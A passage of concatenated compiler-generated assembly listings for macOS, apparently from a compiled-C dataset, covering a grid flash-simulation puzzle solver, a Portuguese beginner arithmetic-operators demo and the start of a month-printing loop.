@x .comm _m,8,3 ; @m .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "\nAfter step %i\n" l_.str.1: ; @.str.1 .asciz "%i" l_.str.2: ; @.str.2 .asciz "\n" l_.str.3: ; @.str.3 .asciz "d11_input" l_.str.4: ; @.str.4 .asciz "d11_short_input" l_.str.5: ; @.str.5 .asciz "r" l_.str.6: ; @.str.6 .asciz "cant read file\n" l_.str.7: ; @.str.7 .asciz "\nflashes synchronised after %i steps\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _increase_neighbours ## -- Begin function increase_neighbours .p2align 4, 0x90 _increase_neighbours: ## @increase_neighbours .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl $0, -12(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 cmpl $8, -12(%rbp) jge LBB0_14 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl -4(%rbp), %eax movslq -12(%rbp), %rdx leaq _ni(%rip), %rcx addl (%rcx,%rdx,4), %eax movl %eax, -16(%rbp) movl -8(%rbp), %eax movslq -12(%rbp), %rdx leaq _nj(%rip), %rcx addl (%rcx,%rdx,4), %eax movl %eax, -20(%rbp) movl $0, -24(%rbp) cmpl $0, -16(%rbp) jl LBB0_4 ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -16(%rbp), %eax movq _y@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jl LBB0_5 LBB0_4: ## in Loop: Header=BB0_1 Depth=1 movl $1, -24(%rbp) LBB0_5: ## in Loop: Header=BB0_1 Depth=1 cmpl $0, -20(%rbp) jl LBB0_7 ## %bb.6: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax movq _x@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jl LBB0_8 LBB0_7: ## in Loop: Header=BB0_1 Depth=1 movl $1, -24(%rbp) LBB0_8: ## in Loop: Header=BB0_1 Depth=1 cmpl $0, -24(%rbp) jne LBB0_12 ## %bb.9: ## in Loop: Header=BB0_1 Depth=1 movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -20(%rbp), %rcx movl (%rax,%rcx,4), %edx addl $1, %edx movl %edx, (%rax,%rcx,4) movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -20(%rbp), %rcx cmpl $10, (%rax,%rcx,4) jne LBB0_11 ## %bb.10: ## in Loop: Header=BB0_1 Depth=1 movl -16(%rbp), %edi movl -20(%rbp), %esi callq _increase_neighbours LBB0_11: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_12 LBB0_12: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_13 LBB0_13: ## in Loop: Header=BB0_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_1 LBB0_14: addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _step ## -- Begin function step .p2align 4, 0x90 _step: ## @step .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl _n_step(%rip), %eax addl $1, %eax movl %eax, _n_step(%rip) movl $0, -4(%rbp) movl $0, -8(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 movl -8(%rbp), %eax movq _y@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB1_10 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl $0, -12(%rbp) LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -12(%rbp), %eax movq _x@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB1_8 ## %bb.4: ## in Loop: Header=BB1_3 Depth=2 movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -8(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -12(%rbp), %rcx movl (%rax,%rcx,4), %edx addl $1, %edx movl %edx, (%rax,%rcx,4) movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -8(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -12(%rbp), %rcx cmpl $10, (%rax,%rcx,4) jne LBB1_6 ## %bb.5: ## in Loop: Header=BB1_3 Depth=2 movl -8(%rbp), %edi movl -12(%rbp), %esi callq _increase_neighbours LBB1_6: ## in Loop: Header=BB1_3 Depth=2 jmp LBB1_7 LBB1_7: ## in Loop: Header=BB1_3 Depth=2 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_3 LBB1_8: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_9 LBB1_9: ## in Loop: Header=BB1_1 Depth=1 movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) jmp LBB1_1 LBB1_10: movl _n_step(%rip), %esi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl $0, -16(%rbp) LBB1_11: ## =>This Loop Header: Depth=1 ## Child Loop BB1_13 Depth 2 movl -16(%rbp), %eax movq _y@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB1_20 ## %bb.12: ## in Loop: Header=BB1_11 Depth=1 movl $0, -20(%rbp) LBB1_13: ## Parent Loop BB1_11 Depth=1 ## => This Inner Loop Header: Depth=2 movl -20(%rbp), %eax movq _x@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB1_18 ## %bb.14: ## in Loop: Header=BB1_13 Depth=2 movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -20(%rbp), %rcx cmpl $9, (%rax,%rcx,4) jle LBB1_16 ## %bb.15: ## in Loop: Header=BB1_13 Depth=2 movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -20(%rbp), %rcx movl $0, (%rax,%rcx,4) movl -4(%rbp), %eax addl $1, %eax movl %eax, -4(%rbp) LBB1_16: ## in Loop: Header=BB1_13 Depth=2 movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -16(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -20(%rbp), %rcx movl (%rax,%rcx,4), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.17: ## in Loop: Header=BB1_13 Depth=2 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_13 LBB1_18: ## in Loop: Header=BB1_11 Depth=1 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.19: ## in Loop: Header=BB1_11 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_11 LBB1_20: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $64, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) cmpl $1, -8(%rbp) setg %al andb $1, %al movzbl %al, %eax movl %eax, -20(%rbp) movl -20(%rbp), %ecx leaq L_.str.4(%rip), %rdi leaq L_.str.3(%rip), %rax cmpl $0, %ecx cmovneq %rax, %rdi leaq L_.str.5(%rip), %rsi callq _fopen movq %rax, -32(%rbp) cmpq $0, -32(%rbp) jne LBB2_2 ## %bb.1: leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf movl $1, -4(%rbp) jmp LBB2_31 LBB2_2: movq _y@GOTPCREL(%rip), %rax movl $0, (%rax) movq _x@GOTPCREL(%rip), %rax movl $0, (%rax) movl $0, -36(%rbp) LBB2_3: ## =>This Inner Loop Header: Depth=1 movq -32(%rbp), %rdi callq _fgetc ## kill: def $al killed $al killed $eax movb %al, -37(%rbp) movsbl -37(%rbp), %eax cmpl $10, %eax jne LBB2_5 ## %bb.4: ## in Loop: Header=BB2_3 Depth=1 movq _y@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _y@GOTPCREL(%rip), %rax movl %ecx, (%rax) movl $1, -36(%rbp) jmp LBB2_3 LBB2_5: ## in Loop: Header=BB2_3 Depth=1 movsbl -37(%rbp), %eax cmpl $-1, %eax jne LBB2_7 ## %bb.6: jmp LBB2_11 LBB2_7: ## in Loop: Header=BB2_3 Depth=1 jmp LBB2_8 LBB2_8: ## in Loop: Header=BB2_3 Depth=1 cmpl $0, -36(%rbp) jne LBB2_10 ## %bb.9: ## in Loop: Header=BB2_3 Depth=1 movq _x@GOTPCREL(%rip), %rax movl (%rax), %ecx addl $1, %ecx movq _x@GOTPCREL(%rip), %rax movl %ecx, (%rax) LBB2_10: ## in Loop: Header=BB2_3 Depth=1 jmp LBB2_3 LBB2_11: movq -32(%rbp), %rdi callq _rewind movq _x@GOTPCREL(%rip), %rax movl (%rax), %eax movq _y@GOTPCREL(%rip), %rcx imull (%rcx), %eax movslq %eax, %rdi shlq $2, %rdi callq _malloc movq %rax, %rcx movq _m@GOTPCREL(%rip), %rax movq %rcx, (%rax) movl $0, -44(%rbp) LBB2_12: ## =>This Inner Loop Header: Depth=1 movl -44(%rbp), %eax movq _y@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB2_15 ## %bb.13: ## in Loop: Header=BB2_12 Depth=1 movq _x@GOTPCREL(%rip), %rax movslq (%rax), %rdi shlq $2, %rdi callq _malloc movq %rax, %rdx movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -44(%rbp), %rcx movq %rdx, (%rax,%rcx,8) ## %bb.14: ## in Loop: Header=BB2_12 Depth=1 movl -44(%rbp), %eax addl $1, %eax movl %eax, -44(%rbp) jmp LBB2_12 LBB2_15: movl $0, -48(%rbp) LBB2_16: ## =>This Loop Header: Depth=1 ## Child Loop BB2_18 Depth 2 movl -48(%rbp), %eax movq _y@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB2_23 ## %bb.17: ## in Loop: Header=BB2_16 Depth=1 movl $0, -52(%rbp) LBB2_18: ## Parent Loop BB2_16 Depth=1 ## => This Inner Loop Header: Depth=2 movl -52(%rbp), %eax movq _x@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB2_21 ## %bb.19: ## in Loop: Header=BB2_18 Depth=2 movq -32(%rbp), %rdi callq _fgetc movl %eax, %edx subl $48, %edx movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -48(%rbp), %rcx movq (%rax,%rcx,8), %rax movslq -52(%rbp), %rcx movl %edx, (%rax,%rcx,4) ## %bb.20: ## in Loop: Header=BB2_18 Depth=2 movl -52(%rbp), %eax addl $1, %eax movl %eax, -52(%rbp) jmp LBB2_18 LBB2_21: ## in Loop: Header=BB2_16 Depth=1 movq -32(%rbp), %rdi callq _fgetc ## %bb.22: ## in Loop: Header=BB2_16 Depth=1 movl -48(%rbp), %eax addl $1, %eax movl %eax, -48(%rbp) jmp LBB2_16 LBB2_23: jmp LBB2_24 LBB2_24: ## =>This Inner Loop Header: Depth=1 callq _step movq _x@GOTPCREL(%rip), %rcx movl (%rcx), %ecx movq _y@GOTPCREL(%rip), %rdx imull (%rdx), %ecx cmpl %ecx, %eax je LBB2_26 ## %bb.25: ## in Loop: Header=BB2_24 Depth=1 jmp LBB2_24 LBB2_26: movl _n_step(%rip), %esi leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf movl $0, -56(%rbp) LBB2_27: ## =>This Inner Loop Header: Depth=1 movl -56(%rbp), %eax movq _y@GOTPCREL(%rip), %rcx cmpl (%rcx), %eax jge LBB2_30 ## %bb.28: ## in Loop: Header=BB2_27 Depth=1 movq _m@GOTPCREL(%rip), %rax movq (%rax), %rax movslq -56(%rbp), %rcx movq (%rax,%rcx,8), %rdi callq _free ## %bb.29: ## in Loop: Header=BB2_27 Depth=1 movl -56(%rbp), %eax addl $1, %eax movl %eax, -56(%rbp) jmp LBB2_27 LBB2_30: movq _m@GOTPCREL(%rip), %rax movq (%rax), %rdi callq _free movl $0, -4(%rbp) LBB2_31: movl -4(%rbp), %eax addq $64, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _n_step ## @n_step .zerofill __DATA,__common,_n_step,4,2 .section __DATA,__data .globl _ni ## @ni .p2align 4 _ni: .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 4294967295 ## 0xffffffff .long 0 ## 0x0 .long 0 ## 0x0 .long 1 ## 0x1 .long 1 ## 0x1 .long 1 ## 0x1 .globl _nj ## @nj .p2align 4 _nj: .long 4294967295 ## 0xffffffff .long 0 ## 0x0 .long 1 ## 0x1 .long 4294967295 ## 0xffffffff .long 1 ## 0x1 .long 4294967295 ## 0xffffffff .long 0 ## 0x0 .long 1 ## 0x1 .comm _y,4,2 ## @y .comm _x,4,2 ## @x .comm _m,8,3 ## @m .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "\nAfter step %i\n" L_.str.1: ## @.str.1 .asciz "%i" L_.str.2: ## @.str.2 .asciz "\n" L_.str.3: ## @.str.3 .asciz "d11_input" L_.str.4: ## @.str.4 .asciz "d11_short_input" L_.str.5: ## @.str.5 .asciz "r" L_.str.6: ## @.str.6 .asciz "cant read file\n" L_.str.7: ## @.str.7 .asciz "\nflashes synchronised after %i steps\n" .subsections_via_symbols
the_stack_data/13248.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 stur w8, [x29, #-16] ; 4-byte Folded Spill stur wzr, [x29, #-4] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf mov x9, sp sub x8, x29, #8 str x8, [x9] sub x8, x29, #12 str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] add w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] mul w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] sdiv w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w12, [x29, #-12] sdiv w10, w9, w12 mul w10, w10, w12 subs w10, w9, w10 mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 str x8, [x9, #16] adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF bl _printf adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 cset w10, eq mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 and x8, x8, #0x1 str x8, [x9, #16] adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 cset w10, lt mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 and x8, x8, #0x1 str x8, [x9, #16] adrp x0, l_.str.9@PAGE add x0, x0, l_.str.9@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 cset w10, gt mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 and x8, x8, #0x1 str x8, [x9, #16] adrp x0, l_.str.10@PAGE add x0, x0, l_.str.10@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 cset w10, ne mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 and x8, x8, #0x1 str x8, [x9, #16] adrp x0, l_.str.11@PAGE add x0, x0, l_.str.11@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 cset w10, le mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 and x8, x8, #0x1 str x8, [x9, #16] adrp x0, l_.str.12@PAGE add x0, x0, l_.str.12@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x11 mov x11, x8 ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 cset w10, ge mov x9, sp str x11, [x9] str x8, [x9, #8] ; implicit-def: $x8 mov x8, x10 and x8, x8, #0x1 str x8, [x9, #16] adrp x0, l_.str.13@PAGE add x0, x0, l_.str.13@PAGEOFF bl _printf ldur w8, [x29, #-8] add w8, w8, #1 stur w8, [x29, #-8] ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.14@PAGE add x0, x0, l_.str.14@PAGEOFF bl _printf ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] ldur w9, [x29, #-12] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.15@PAGE add x0, x0, l_.str.15@PAGEOFF bl _printf ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.16@PAGE add x0, x0, l_.str.16@PAGEOFF bl _printf ldur w8, [x29, #-8] subs w11, w8, #1 stur w11, [x29, #-8] ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp ; implicit-def: $x10 mov x10, x11 str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.17@PAGE add x0, x0, l_.str.17@PAGEOFF bl _printf ldur w8, [x29, #-8] ; implicit-def: $x10 mov x10, x8 mov x8, x10 subs w8, w8, #1 stur w8, [x29, #-8] ldur w9, [x29, #-8] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.18@PAGE add x0, x0, l_.str.18@PAGEOFF bl _printf ldur w0, [x29, #-16] ; 4-byte Folded Reload ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "Introduz os valores de x e y (y diferente de 0):" l_.str.1: ; @.str.1 .asciz "%d %d" l_.str.2: ; @.str.2 .asciz "Soma: %d + %d = %d\n" l_.str.3: ; @.str.3 .asciz "Subtra\303\247\303\243o: %d - %d = %d\n" l_.str.4: ; @.str.4 .asciz "Multiplica\303\247\303\243o: %d * %d = %d\n" l_.str.5: ; @.str.5 .asciz "Divis\303\243o: %d / %d = %d\n" l_.str.6: ; @.str.6 .asciz "M\303\263dulo: %d % %d = %d\n" l_.str.7: ; @.str.7 .asciz "\ntrue \303\251 representado por 1 e false por 0\n\n" l_.str.8: ; @.str.8 .asciz "Igualdade: %d == %d --> %d\n" l_.str.9: ; @.str.9 .asciz "Menor: %d < %d --> %d\n" l_.str.10: ; @.str.10 .asciz "Maior: %d > %d --> %d\n" l_.str.11: ; @.str.11 .asciz "Diferen\303\247a: %d != %d --> %d\n" l_.str.12: ; @.str.12 .asciz "Menor Igual: %d <= %d --> %d\n" l_.str.13: ; @.str.13 .asciz "Maior Igual: %d >= %d --> %d\n" l_.str.14: ; @.str.14 .asciz "Incrementar x: %d\n" l_.str.15: ; @.str.15 .asciz "Incrementar y: %d\n" l_.str.16: ; @.str.16 .asciz "Decrementar x:\n" l_.str.17: ; @.str.17 .asciz "\tOperador -- antes, valor x = %d , valor depois\n" l_.str.18: ; @.str.18 .asciz "\tOperador -- depois, valor x = %d , valor depois\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf leaq L_.str.1(%rip), %rdi leaq -8(%rbp), %rsi leaq -12(%rbp), %rdx movb $0, %al callq _scanf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %ecx addl -12(%rbp), %ecx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %ecx subl -12(%rbp), %ecx leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %ecx imull -12(%rbp), %ecx leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %eax movl %eax, -20(%rbp) ## 4-byte Spill movl -8(%rbp), %eax cltd idivl -12(%rbp) movl -20(%rbp), %edx ## 4-byte Reload movl %eax, %ecx leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %eax movl %eax, -16(%rbp) ## 4-byte Spill movl -8(%rbp), %eax cltd idivl -12(%rbp) movl %edx, %ecx movl -16(%rbp), %edx ## 4-byte Reload leaq L_.str.6(%rip), %rdi movb $0, %al callq _printf leaq L_.str.7(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %eax cmpl -12(%rbp), %eax sete %al andb $1, %al movzbl %al, %ecx leaq L_.str.8(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %eax cmpl -12(%rbp), %eax setl %al andb $1, %al movzbl %al, %ecx leaq L_.str.9(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %eax cmpl -12(%rbp), %eax setg %al andb $1, %al movzbl %al, %ecx leaq L_.str.10(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %eax cmpl -12(%rbp), %eax setne %al andb $1, %al movzbl %al, %ecx leaq L_.str.11(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %eax cmpl -12(%rbp), %eax setle %al andb $1, %al movzbl %al, %ecx leaq L_.str.12(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl -12(%rbp), %edx movl -8(%rbp), %eax cmpl -12(%rbp), %eax setge %al andb $1, %al movzbl %al, %ecx leaq L_.str.13(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %eax addl $1, %eax movl %eax, -8(%rbp) movl -8(%rbp), %esi leaq L_.str.14(%rip), %rdi movb $0, %al callq _printf movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) movl -12(%rbp), %esi leaq L_.str.15(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi leaq L_.str.16(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi addl $-1, %esi movl %esi, -8(%rbp) movl -8(%rbp), %edx leaq L_.str.17(%rip), %rdi movb $0, %al callq _printf movl -8(%rbp), %esi movl %esi, %eax addl $-1, %eax movl %eax, -8(%rbp) movl -8(%rbp), %edx leaq L_.str.18(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "Introduz os valores de x e y (y diferente de 0):" L_.str.1: ## @.str.1 .asciz "%d %d" L_.str.2: ## @.str.2 .asciz "Soma: %d + %d = %d\n" L_.str.3: ## @.str.3 .asciz "Subtra\303\247\303\243o: %d - %d = %d\n" L_.str.4: ## @.str.4 .asciz "Multiplica\303\247\303\243o: %d * %d = %d\n" L_.str.5: ## @.str.5 .asciz "Divis\303\243o: %d / %d = %d\n" L_.str.6: ## @.str.6 .asciz "M\303\263dulo: %d % %d = %d\n" L_.str.7: ## @.str.7 .asciz "\ntrue \303\251 representado por 1 e false por 0\n\n" L_.str.8: ## @.str.8 .asciz "Igualdade: %d == %d --> %d\n" L_.str.9: ## @.str.9 .asciz "Menor: %d < %d --> %d\n" L_.str.10: ## @.str.10 .asciz "Maior: %d > %d --> %d\n" L_.str.11: ## @.str.11 .asciz "Diferen\303\247a: %d != %d --> %d\n" L_.str.12: ## @.str.12 .asciz "Menor Igual: %d <= %d --> %d\n" L_.str.13: ## @.str.13 .asciz "Maior Igual: %d >= %d --> %d\n" L_.str.14: ## @.str.14 .asciz "Incrementar x: %d\n" L_.str.15: ## @.str.15 .asciz "Incrementar y: %d\n" L_.str.16: ## @.str.16 .asciz "Decrementar x:\n" L_.str.17: ## @.str.17 .asciz "\tOperador -- antes, valor x = %d , valor depois\n" L_.str.18: ## @.str.18 .asciz "\tOperador -- depois, valor x = %d , valor depois\n" .subsections_via_symbols
the_stack_data/77472.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #176 .cfi_def_cfa_offset 176 stp x29, x30, [sp, #160] ; 16-byte Folded Spill add x29, sp, #160 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-8] str wzr, [sp, #52] str w0, [sp, #48] str x1, [sp, #40] sub x0, x29, #56 adrp x1, l___const.main.monthDays@PAGE add x1, x1, l___const.main.monthDays@PAGEOFF mov x2, #48 str x2, [sp, #24] ; 8-byte Folded Spill bl _memcpy ldr x2, [sp, #24] ; 8-byte Folded Reload add x0, sp, #56 adrp x1, l___const.main.months@PAGE add x1, x1, l___const.main.months@PAGEOFF bl _memcpy str wzr, [sp, #36] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldr w8, [sp, #36] subs w8, w8, #12 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #32] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #32] ldrsw x10, [sp, #36] sub x9, x29, #56 ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldr w8, [sp, #32] add w11, w8, #1 ldrsw x9, [sp, #36] add x8, sp, #56 ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp ; implicit-def: $x10 mov x10, x11 str x10, [x9] str x8, [x9, #8] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf b LBB0_5 LBB0_5: ; in Loop: 